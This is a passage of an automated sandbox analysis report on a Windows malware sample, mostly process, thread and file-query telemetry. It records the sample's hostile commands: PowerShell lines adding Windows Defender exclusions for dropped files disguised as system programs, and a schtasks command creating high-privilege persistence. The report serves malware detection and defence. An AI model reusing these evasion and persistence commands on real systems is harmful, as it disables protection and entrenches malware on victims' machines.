                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -9223372036854770s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 3122 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -11068046444225724s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 3396 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep count: 3163 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe TID: 3908Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\ctfmon.exe TID: 7660Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\ctfmon.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599859Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599734Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599625Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599502Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599375Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599266Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599141Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599031Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 598915Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 100000Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99891Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99781Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99672Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99563Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99438Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99313Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99175Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99047Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98937Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98821Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98689Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98563Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98437Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98328Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98219Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98110Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 97985Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596734Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596604Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596499Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596370Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596203Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596009Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 595828Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\ctfmon.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ctfmon.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: LzmJLVB41K.exe, 00000000.00000002.2390828260.000000001B99B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\2
                            Source: LzmJLVB41K.exe, 00000000.00000002.2393555582.000000001C0AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll55
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /fJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeQueries volume information: C:\Users\user\Desktop\LzmJLVB41K.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeQueries volume information: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe VolumeInformationJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeQueries volume information: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe VolumeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Recovery\ctfmon.exe VolumeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Recovery\ctfmon.exe VolumeInformation
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe VolumeInformation
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe VolumeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeQueries volume information: C:\Users\user\Desktop\LzmJLVB41K.exe VolumeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeQueries volume information: C:\Users\user\Desktop\LzmJLVB41K.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
